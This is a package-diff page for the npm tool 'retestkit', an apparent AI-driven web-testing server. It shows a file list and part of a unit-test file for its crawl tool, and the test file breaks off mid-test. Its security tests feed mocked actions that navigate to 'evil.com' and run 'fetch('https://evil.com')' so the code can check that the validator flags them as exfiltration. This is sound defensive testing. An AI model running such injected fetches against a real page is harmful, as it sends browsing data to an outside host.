npm - retestkit - Versions diffs - 1.4.1 - Mend

retestkit 1.4.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (327) hide show

package/.claude/commands/openspec/apply.md +23 -0
package/.claude/commands/openspec/archive.md +27 -0
package/.claude/commands/openspec/proposal.md +28 -0
package/.gemini/commands/openspec/apply.toml +21 -0
package/.gemini/commands/openspec/archive.toml +25 -0
package/.gemini/commands/openspec/proposal.toml +26 -0
package/.github/prompts/openspec-apply.prompt.md +22 -0
package/.github/prompts/openspec-archive.prompt.md +26 -0
package/.github/prompts/openspec-proposal.prompt.md +27 -0
package/.github/workflows/release.yml +33 -0
package/.kilocode/workflows/openspec-apply.md +17 -0
package/.kilocode/workflows/openspec-archive.md +21 -0
package/.kilocode/workflows/openspec-proposal.md +22 -0
package/.mcp.json +23 -0
package/.opencode/command/openspec-apply.md +25 -0
package/.opencode/command/openspec-archive.md +28 -0
package/.opencode/command/openspec-proposal.md +30 -0
package/.roo/commands/openspec-apply.md +20 -0
package/.roo/commands/openspec-archive.md +24 -0
package/.roo/commands/openspec-proposal.md +25 -0
package/.vscode/mcp.json +23 -0
package/AGENTS.md +18 -0
package/CLAUDE.md +18 -0
package/LICENSE +65 -0
package/README.md +303 -0
package/dist/config.d.ts +4 -0
package/dist/config.d.ts.map +1 -0
package/dist/config.js +27 -0
package/dist/config.js.map +1 -0
package/dist/elicitation/index.d.ts +17 -0
package/dist/elicitation/index.d.ts.map +1 -0
package/dist/elicitation/index.js +118 -0
package/dist/elicitation/index.js.map +1 -0
package/dist/elicitation/types.d.ts +35 -0
package/dist/elicitation/types.d.ts.map +1 -0
package/dist/elicitation/types.js +39 -0
package/dist/elicitation/types.js.map +1 -0
package/dist/index.d.ts +3 -0
package/dist/index.d.ts.map +1 -0
package/dist/index.js +76 -0
package/dist/index.js.map +1 -0
package/dist/lifecycle/index.d.ts +31 -0
package/dist/lifecycle/index.d.ts.map +1 -0
package/dist/lifecycle/index.js +61 -0
package/dist/lifecycle/index.js.map +1 -0
package/dist/logger.d.ts +21 -0
package/dist/logger.d.ts.map +1 -0
package/dist/logger.js +182 -0
package/dist/logger.js.map +1 -0
package/dist/playwright-client/index.d.ts +29 -0
package/dist/playwright-client/index.d.ts.map +1 -0
package/dist/playwright-client/index.js +288 -0
package/dist/playwright-client/index.js.map +1 -0
package/dist/playwright-client/types.d.ts +44 -0
package/dist/playwright-client/types.d.ts.map +1 -0
package/dist/playwright-client/types.js +49 -0
package/dist/playwright-client/types.js.map +1 -0
package/dist/progress/index.d.ts +39 -0
package/dist/progress/index.d.ts.map +1 -0
package/dist/progress/index.js +106 -0
package/dist/progress/index.js.map +1 -0
package/dist/progress/types.d.ts +24 -0
package/dist/progress/types.d.ts.map +1 -0
package/dist/progress/types.js +2 -0
package/dist/progress/types.js.map +1 -0
package/dist/prompts/index.d.ts +19 -0
package/dist/prompts/index.d.ts.map +1 -0
package/dist/prompts/index.js +207 -0
package/dist/prompts/index.js.map +1 -0
package/dist/prompts/loader.d.ts +20 -0
package/dist/prompts/loader.d.ts.map +1 -0
package/dist/prompts/loader.js +47 -0
package/dist/prompts/loader.js.map +1 -0
package/dist/resources/index.d.ts +27 -0
package/dist/resources/index.d.ts.map +1 -0
package/dist/resources/index.js +186 -0
package/dist/resources/index.js.map +1 -0
package/dist/resources/subscriptions.d.ts +10 -0
package/dist/resources/subscriptions.d.ts.map +1 -0
package/dist/resources/subscriptions.js +23 -0
package/dist/resources/subscriptions.js.map +1 -0
package/dist/sampling/index.d.ts +11 -0
package/dist/sampling/index.d.ts.map +1 -0
package/dist/sampling/index.js +201 -0
package/dist/sampling/index.js.map +1 -0
package/dist/sampling/prompts.d.ts +56 -0
package/dist/sampling/prompts.d.ts.map +1 -0
package/dist/sampling/prompts.js +124 -0
package/dist/sampling/prompts.js.map +1 -0
package/dist/sampling/types.d.ts +57 -0
package/dist/sampling/types.d.ts.map +1 -0
package/dist/sampling/types.js +2 -0
package/dist/sampling/types.js.map +1 -0
package/dist/schemas/config.d.ts +40 -0
package/dist/schemas/config.d.ts.map +1 -0
package/dist/schemas/config.js +30 -0
package/dist/schemas/config.js.map +1 -0
package/dist/security/index.d.ts +38 -0
package/dist/security/index.d.ts.map +1 -0
package/dist/security/index.js +281 -0
package/dist/security/index.js.map +1 -0
package/dist/server.d.ts +9 -0
package/dist/server.d.ts.map +1 -0
package/dist/server.js +142 -0
package/dist/server.js.map +1 -0
package/dist/test-utils/index.d.ts +6 -0
package/dist/test-utils/index.d.ts.map +1 -0
package/dist/test-utils/index.js +6 -0
package/dist/test-utils/index.js.map +1 -0
package/dist/test-utils/mock-context.d.ts +64 -0
package/dist/test-utils/mock-context.d.ts.map +1 -0
package/dist/test-utils/mock-context.js +347 -0
package/dist/test-utils/mock-context.js.map +1 -0
package/dist/test-utils/mock-playwright-client.d.ts +62 -0
package/dist/test-utils/mock-playwright-client.d.ts.map +1 -0
package/dist/test-utils/mock-playwright-client.js +315 -0
package/dist/test-utils/mock-playwright-client.js.map +1 -0
package/dist/tools/index.d.ts +4 -0
package/dist/tools/index.d.ts.map +1 -0
package/dist/tools/index.js +8 -0
package/dist/tools/index.js.map +1 -0
package/dist/tools/webtest/crawl.d.ts +46 -0
package/dist/tools/webtest/crawl.d.ts.map +1 -0
package/dist/tools/webtest/crawl.js +678 -0
package/dist/tools/webtest/crawl.js.map +1 -0
package/dist/tools/webtest/discover-features.d.ts +30 -0
package/dist/tools/webtest/discover-features.d.ts.map +1 -0
package/dist/tools/webtest/discover-features.js +343 -0
package/dist/tools/webtest/discover-features.js.map +1 -0
package/dist/tools/webtest/discover-flows.d.ts +29 -0
package/dist/tools/webtest/discover-flows.d.ts.map +1 -0
package/dist/tools/webtest/discover-flows.js +341 -0
package/dist/tools/webtest/discover-flows.js.map +1 -0
package/dist/tools/webtest/generate-tests.d.ts +54 -0
package/dist/tools/webtest/generate-tests.d.ts.map +1 -0
package/dist/tools/webtest/generate-tests.js +364 -0
package/dist/tools/webtest/generate-tests.js.map +1 -0
package/dist/tools/webtest/index.d.ts +8 -0
package/dist/tools/webtest/index.d.ts.map +1 -0
package/dist/tools/webtest/index.js +8 -0
package/dist/tools/webtest/index.js.map +1 -0
package/dist/tools/webtest/run-test-case.d.ts +28 -0
package/dist/tools/webtest/run-test-case.d.ts.map +1 -0
package/dist/tools/webtest/run-test-case.js +420 -0
package/dist/tools/webtest/run-test-case.js.map +1 -0
package/dist/tools/webtest/schemas.d.ts +175 -0
package/dist/tools/webtest/schemas.d.ts.map +1 -0
package/dist/tools/webtest/schemas.js +156 -0
package/dist/tools/webtest/schemas.js.map +1 -0
package/dist/tools/webtest/start-analysis.d.ts +16 -0
package/dist/tools/webtest/start-analysis.d.ts.map +1 -0
package/dist/tools/webtest/start-analysis.js +137 -0
package/dist/tools/webtest/start-analysis.js.map +1 -0
package/dist/transports/http.d.ts +8 -0
package/dist/transports/http.d.ts.map +1 -0
package/dist/transports/http.js +9 -0
package/dist/transports/http.js.map +1 -0
package/dist/transports/index.d.ts +14 -0
package/dist/transports/index.d.ts.map +1 -0
package/dist/transports/index.js +20 -0
package/dist/transports/index.js.map +1 -0
package/dist/transports/stdio.d.ts +4 -0
package/dist/transports/stdio.d.ts.map +1 -0
package/dist/transports/stdio.js +6 -0
package/dist/transports/stdio.js.map +1 -0
package/dist/types/capabilities.d.ts +18 -0
package/dist/types/capabilities.d.ts.map +1 -0
package/dist/types/capabilities.js +35 -0
package/dist/types/capabilities.js.map +1 -0
package/dist/types/context.d.ts +20 -0
package/dist/types/context.d.ts.map +1 -0
package/dist/types/context.js +2 -0
package/dist/types/context.js.map +1 -0
package/dist/types/tool.d.ts +10 -0
package/dist/types/tool.d.ts.map +1 -0
package/dist/types/tool.js +2 -0
package/dist/types/tool.js.map +1 -0
package/dist/workspace/index.d.ts +99 -0
package/dist/workspace/index.d.ts.map +1 -0
package/dist/workspace/index.js +648 -0
package/dist/workspace/index.js.map +1 -0
package/dist/workspace/markdown.d.ts +50 -0
package/dist/workspace/markdown.d.ts.map +1 -0
package/dist/workspace/markdown.js +210 -0
package/dist/workspace/markdown.js.map +1 -0
package/dist/workspace/types.d.ts +173 -0
package/dist/workspace/types.d.ts.map +1 -0
package/dist/workspace/types.js +2 -0
package/dist/workspace/types.js.map +1 -0
package/openspec/AGENTS.md +456 -0
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/proposal.md +33 -0
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-resources/spec.md +27 -0
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-tools/spec.md +304 -0
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/tasks.md +43 -0
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/design.md +209 -0
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/proposal.md +41 -0
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/specs/mcp-server-core/spec.md +183 -0
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/tasks.md +112 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/design.md +333 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/proposal.md +66 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/mcp-server-core/spec.md +129 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-lifecycle/spec.md +138 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-logging/spec.md +211 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-prompts/spec.md +157 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-resources/spec.md +213 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-sampling/spec.md +257 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-tools/spec.md +501 -0
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/tasks.md +264 -0
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/proposal.md +24 -0
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/specs/webtest-tools/spec.md +80 -0
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/tasks.md +8 -0
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/design.md +90 -0
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/proposal.md +28 -0
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/specs/webtest-sampling/spec.md +90 -0
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/tasks.md +33 -0
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/design.md +558 -0
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/proposal.md +119 -0
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-resources/spec.md +109 -0
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-tools/spec.md +121 -0
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/tasks.md +133 -0
package/openspec/changes/extract-prompts-to-markdown/design.md +86 -0
package/openspec/changes/extract-prompts-to-markdown/proposal.md +50 -0
package/openspec/changes/extract-prompts-to-markdown/specs/webtest-prompts/spec.md +74 -0
package/openspec/changes/extract-prompts-to-markdown/tasks.md +40 -0
package/openspec/changes/refactor-webtest-naming/design.md +95 -0
package/openspec/changes/refactor-webtest-naming/proposal.md +66 -0
package/openspec/changes/refactor-webtest-naming/specs/webtest-prompts/spec.md +79 -0
package/openspec/changes/refactor-webtest-naming/specs/webtest-resources/spec.md +80 -0
package/openspec/changes/refactor-webtest-naming/specs/webtest-sampling/spec.md +122 -0
package/openspec/changes/refactor-webtest-naming/specs/webtest-tools/spec.md +113 -0
package/openspec/changes/refactor-webtest-naming/tasks.md +119 -0
package/openspec/changes/rename-package-to-retest/proposal.md +52 -0
package/openspec/changes/rename-package-to-retest/specs/mcp-server-core/spec.md +53 -0
package/openspec/changes/rename-package-to-retest/specs/retest-lifecycle/spec.md +68 -0
package/openspec/changes/rename-package-to-retest/specs/retest-logging/spec.md +35 -0
package/openspec/changes/rename-package-to-retest/specs/retest-prompts/spec.md +159 -0
package/openspec/changes/rename-package-to-retest/specs/retest-resources/spec.md +251 -0
package/openspec/changes/rename-package-to-retest/specs/retest-sampling/spec.md +99 -0
package/openspec/changes/rename-package-to-retest/specs/retest-tools/spec.md +295 -0
package/openspec/changes/rename-package-to-retest/tasks.md +71 -0
package/openspec/project.md +31 -0
package/openspec/specs/mcp-server-core/spec.md +178 -0
package/openspec/specs/webtest-lifecycle/spec.md +136 -0
package/openspec/specs/webtest-logging/spec.md +209 -0
package/openspec/specs/webtest-prompts/spec.md +155 -0
package/openspec/specs/webtest-resources/spec.md +248 -0
package/openspec/specs/webtest-sampling/spec.md +344 -0
package/openspec/specs/webtest-tools/spec.md +282 -0
package/package.json +54 -0
package/release.config.js +9 -0
package/src/config.test.ts +96 -0
package/src/config.ts +32 -0
package/src/elicitation/index.test.ts +399 -0
package/src/elicitation/index.ts +171 -0
package/src/elicitation/types.ts +68 -0
package/src/index.ts +83 -0
package/src/lifecycle/index.test.ts +260 -0
package/src/lifecycle/index.ts +101 -0
package/src/logger.redaction.test.ts +322 -0
package/src/logger.test.ts +123 -0
package/src/logger.ts +229 -0
package/src/playwright-client/index.ts +392 -0
package/src/playwright-client/types.ts +99 -0
package/src/progress/index.test.ts +327 -0
package/src/progress/index.ts +170 -0
package/src/progress/types.ts +25 -0
package/src/prompts/index.test.ts +451 -0
package/src/prompts/index.ts +246 -0
package/src/prompts/loader.test.ts +100 -0
package/src/prompts/loader.ts +59 -0
package/src/prompts/templates/mcp/webtest-crawl.md +7 -0
package/src/prompts/templates/mcp/webtest-discover-flows.md +11 -0
package/src/prompts/templates/mcp/webtest-discover.md +12 -0
package/src/prompts/templates/mcp/webtest-full-workflow.md +12 -0
package/src/prompts/templates/mcp/webtest-generate-tests.md +11 -0
package/src/prompts/templates/mcp/webtest-run-test.md +11 -0
package/src/prompts/templates/mcp/webtest-start.md +8 -0
package/src/prompts/templates/sampling/crawl-action.md +35 -0
package/src/prompts/templates/sampling/feature-discovery.md +27 -0
package/src/prompts/templates/sampling/flow-discovery.md +29 -0
package/src/prompts/templates/sampling/page-content-wrapper.md +5 -0
package/src/prompts/templates/sampling/system-prefix.md +12 -0
package/src/prompts/templates/sampling/test-evaluation.md +17 -0
package/src/prompts/templates/sampling/test-generation.md +31 -0
package/src/resources/index.ts +250 -0
package/src/resources/subscriptions.ts +37 -0
package/src/sampling/index.test.ts +414 -0
package/src/sampling/index.ts +286 -0
package/src/sampling/prompts.ts +194 -0
package/src/sampling/types.ts +60 -0
package/src/schemas/config.ts +39 -0
package/src/security/index.test.ts +441 -0
package/src/security/index.ts +361 -0
package/src/security/security-scenarios.test.ts +468 -0
package/src/server.ts +211 -0
package/src/test-utils/index.ts +6 -0
package/src/test-utils/mock-context.ts +426 -0
package/src/test-utils/mock-playwright-client.ts +422 -0
package/src/tools/index.ts +11 -0
package/src/tools/webtest/crawl.test.ts +834 -0
package/src/tools/webtest/crawl.ts +901 -0
package/src/tools/webtest/discover-features.ts +412 -0
package/src/tools/webtest/discover-flows.ts +408 -0
package/src/tools/webtest/generate-tests.test.ts +532 -0
package/src/tools/webtest/generate-tests.ts +425 -0
package/src/tools/webtest/index.ts +7 -0
package/src/tools/webtest/integration.test.ts +536 -0
package/src/tools/webtest/run-test-case.test.ts +659 -0
package/src/tools/webtest/run-test-case.ts +508 -0
package/src/tools/webtest/schemas.ts +201 -0
package/src/tools/webtest/start-analysis.test.ts +151 -0
package/src/tools/webtest/start-analysis.ts +158 -0
package/src/transports/http.ts +19 -0
package/src/transports/index.ts +30 -0
package/src/transports/stdio.ts +7 -0
package/src/types/capabilities.test.ts +193 -0
package/src/types/capabilities.ts +50 -0
package/src/types/context.ts +21 -0
package/src/types/tool.ts +11 -0
package/src/workspace/index.ts +945 -0
package/src/workspace/markdown.ts +272 -0
package/src/workspace/types.ts +186 -0
package/tests/integration/server.test.ts +89 -0
package/tests/integration/tools.test.ts +99 -0
package/tsconfig.json +20 -0
package/vitest.config.ts +9 -0
package/vitest.integration.config.ts +10 -0

package/src/tools/webtest/crawl.test.ts ADDED Viewed

@@ -0,0 +1,834 @@
+/**
+ * Unit Tests for webtest_crawl_app tool (Phase 4.13)
+ */
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { createCrawlTool } from "./crawl.js";
+import {
+  createMockContext,
+  type MockContext,
+} from "../../test-utils/index.js";
+describe("webtest_crawl_app", () => {
+  let context: MockContext;
+  let tool: ReturnType<typeof createCrawlTool>;
+  beforeEach(() => {
+    context = createMockContext();
+    tool = createCrawlTool(() => context as any);
+  });
+  describe("tool metadata", () => {
+    it("has correct name", () => {
+      expect(tool.name).toBe("webtest_crawl_app");
+    });
+    it("has a description", () => {
+      expect(tool.description).toBeDefined();
+      expect(tool.description.length).toBeGreaterThan(0);
+    });
+    it("has an input schema", () => {
+      expect(tool.inputSchema).toBeDefined();
+    });
+  });
+  describe("handler - validation", () => {
+    it("returns error for non-existent workspace", async () => {
+      context.workspaceManager.workspaceExists = vi.fn().mockResolvedValue(false);
+      const result = await tool.handler({
+        analysisId: "00000000-0000-0000-0000-000000000000",
+        goal: "Explore the site",
+      });
+      expect(result.isError).toBe(true);
+      expect(result.content[0].text).toContain("not found");
+    });
+    it("validates analysisId format via schema", () => {
+      // The schema requires UUID format
+      const schema = tool.inputSchema;
+      expect(schema).toBeDefined();
+    });
+    it("requires goal parameter", () => {
+      const schema = tool.inputSchema;
+      expect(schema).toBeDefined();
+    });
+  });
+  describe("handler - crawl execution", () => {
+    beforeEach(async () => {
+      // Set up successful sampling that completes immediately
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Goal achieved",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await context.playwrightClient.connect();
+    });
+    it("creates crawl in workspace", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(result.isError).toBeFalsy();
+      expect(context.workspaceManager.createCrawl).toHaveBeenCalled();
+    });
+    it("connects to playwright if not connected", async () => {
+      context.playwrightClient.isConnected = vi.fn().mockReturnValue(false);
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(context.playwrightClient.connect).toHaveBeenCalled();
+    });
+    it("navigates to workspace URL", async () => {
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(context.playwrightClient.navigate).toHaveBeenCalled();
+    });
+    it("captures page snapshot", async () => {
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(context.playwrightClient.snapshot).toHaveBeenCalled();
+    });
+    it("returns crawlId in response", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(result.isError).toBeFalsy();
+      const content = JSON.parse(result.content[0].text!);
+      expect(content.crawlId).toBeDefined();
+    });
+    it("returns status completed when goal achieved", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(result.isError).toBeFalsy();
+      const content = JSON.parse(result.content[0].text!);
+      expect(content.status).toBe("completed");
+      expect(content.goalComplete).toBe(true);
+    });
+    it("returns next steps after completion", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      const content = JSON.parse(result.content[0].text!);
+      expect(content.nextSteps).toBeInstanceOf(Array);
+      expect(content.nextSteps.length).toBeGreaterThan(0);
+    });
+  });
+  describe("handler - limits", () => {
+    beforeEach(async () => {
+      await context.playwrightClient.connect();
+    });
+    it("uses workspace limits by default", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(context.workspaceManager.createCrawl).toHaveBeenCalledWith(
+        context.testAnalysisId,
+        expect.objectContaining({
+          limits: expect.objectContaining({
+            maxSteps: expect.any(Number),
+          }),
+        })
+      );
+    });
+    it("respects custom limits", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+        limits: { maxSteps: 5 },
+      });
+      expect(context.workspaceManager.createCrawl).toHaveBeenCalledWith(
+        context.testAnalysisId,
+        expect.objectContaining({
+          limits: expect.objectContaining({
+            maxSteps: 5,
+          }),
+        })
+      );
+    });
+  });
+  describe("handler - fallback mode", () => {
+    beforeEach(async () => {
+      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
+      await context.playwrightClient.connect();
+    });
+    it("returns prompt when sampling unavailable", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(result.isError).toBeFalsy();
+      const content = JSON.parse(result.content[0].text!);
+      expect(content.needsManualInput).toBe(true);
+      expect(content.prompt).toBeDefined();
+    });
+    it("includes instructions for manual mode", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      const content = JSON.parse(result.content[0].text!);
+      expect(content.instructions).toContain("manualNextActions");
+    });
+    it("includes partial results info", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      const content = JSON.parse(result.content[0].text!);
+      expect(content.partialResults).toBeDefined();
+    });
+  });
+  describe("handler - manual actions", () => {
+    beforeEach(async () => {
+      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
+      await context.playwrightClient.connect();
+    });
+    it("executes manual actions when provided", async () => {
+      // First call triggers the manual flow and executes the action
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+        manualNextActions: [
+          { tool: "click", args: { element: "Submit button", ref: "e1" } },
+        ],
+      });
+      expect(context.playwrightClient.click).toHaveBeenCalledWith("Submit button", "e1");
+    });
+    it("validates manual actions for security", async () => {
+      context.securityValidator.validateAction = vi.fn().mockReturnValue({
+        valid: false,
+        reason: "External domain not allowed",
+      });
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+        manualNextActions: [
+          { tool: "navigate", args: { url: "https://evil.com" } },
+        ],
+      });
+      expect(result.isError).toBe(true);
+      expect(result.content[0].text).toContain("Security error");
+    });
+  });
+  describe("handler - cancellation", () => {
+    it("handles cancellation gracefully", async () => {
+      // Set up to throw cancellation error
+      const { CancellationError } = await import("../../progress/index.js");
+      context.cancellationRegistry.checkCancelled = vi.fn().mockImplementation((id) => {
+        throw new CancellationError(id);
+      });
+      await context.playwrightClient.connect();
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(result.isError).toBeFalsy();
+      const content = JSON.parse(result.content[0].text!);
+      expect(content.status).toBe("cancelled");
+    });
+    it("registers for cancellation on start", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await context.playwrightClient.connect();
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(context.cancellationRegistry.register).toHaveBeenCalled();
+    });
+    it("unregisters cancellation on completion", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await context.playwrightClient.connect();
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(context.cancellationRegistry.unregister).toHaveBeenCalled();
+    });
+  });
+  describe("handler - progress reporting", () => {
+    beforeEach(async () => {
+      await context.playwrightClient.connect();
+    });
+    it("emits progress during crawl", async () => {
+      let stepCount = 0;
+      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
+        stepCount++;
+        if (stepCount >= 2) {
+          return {
+            success: true,
+            data: {
+              actions: [],
+              reasoning: "Done",
+              goalProgress: "Complete",
+              goalComplete: true,
+            },
+          };
+        }
+        return {
+          success: true,
+          data: {
+            actions: [{ tool: "click", args: { selector: "a" } }],
+            reasoning: "Exploring",
+            goalProgress: `Step ${stepCount}`,
+            goalComplete: false,
+          },
+        };
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+      });
+      expect(context.progressEmitter.emit).toHaveBeenCalled();
+    });
+  });
+  describe("handler - checkpoint and resume", () => {
+    beforeEach(async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await context.playwrightClient.connect();
+    });
+    it("supports resume flag", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore the site",
+        resume: true,
+      });
+      expect(result.isError).toBeFalsy();
+      expect(context.workspaceManager.loadCheckpoint).toHaveBeenCalled();
+    });
+    it("continues from checkpoint when available", async () => {
+      context.workspaceManager.loadCheckpoint = vi.fn().mockResolvedValue({
+        step: 5,
+        timestamp: new Date().toISOString(),
+        visitedUrls: ["https://shop.example.com", "https://shop.example.com/products"],
+        currentUrl: "https://shop.example.com/products",
+        goalProgress: "Found products",
+        canResume: true,
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Continue exploring",
+        resume: true,
+      });
+      // Should navigate to checkpoint URL
+      expect(context.playwrightClient.navigate).toHaveBeenCalled();
+    });
+    it("starts fresh when no checkpoint available", async () => {
+      context.workspaceManager.loadCheckpoint = vi.fn().mockResolvedValue(null);
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+        resume: true,
+      });
+      // Should still work
+      expect(context.playwrightClient.navigate).toHaveBeenCalled();
+    });
+  });
+  describe("handler - security validation", () => {
+    beforeEach(async () => {
+      await context.playwrightClient.connect();
+    });
+    it("validates actions against allowed domains", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [{ tool: "navigate", args: { url: "https://evil.com" } }],
+          reasoning: "Navigating",
+          goalProgress: "Exploring",
+          goalComplete: false,
+        },
+      }).mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      context.securityValidator.validateAction = vi.fn().mockReturnValue({
+        valid: false,
+        reason: "External domain not allowed",
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(context.securityValidator.validateAction).toHaveBeenCalled();
+    });
+    it("detects exfiltration attempts", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [{ tool: "evaluate", args: { script: "fetch('https://evil.com')" } }],
+          reasoning: "Running script",
+          goalProgress: "Testing",
+          goalComplete: false,
+        },
+      }).mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      context.securityValidator.detectExfiltrationAttempt = vi.fn().mockReturnValue({
+        detected: true,
+        type: "external_request",
+        evidence: "POST to external",
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(context.securityValidator.detectExfiltrationAttempt).toHaveBeenCalled();
+    });
+    it("checks for injection in page content", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(context.securityValidator.detectInjectionAttempt).toHaveBeenCalled();
+    });
+  });
+  describe("handler - action execution", () => {
+    beforeEach(async () => {
+      await context.playwrightClient.connect();
+    });
+    it("executes click actions", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [{ tool: "click", args: { element: "Submit button", ref: "e1" } }],
+          reasoning: "Clicking button",
+          goalProgress: "Clicking",
+          goalComplete: false,
+        },
+      }).mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(context.playwrightClient.click).toHaveBeenCalledWith("Submit button", "e1");
+    });
+    it("executes type actions", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [{ tool: "type", args: { element: "Input field", ref: "e2", text: "hello" } }],
+          reasoning: "Typing",
+          goalProgress: "Typing",
+          goalComplete: false,
+        },
+      }).mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await tool.handler({
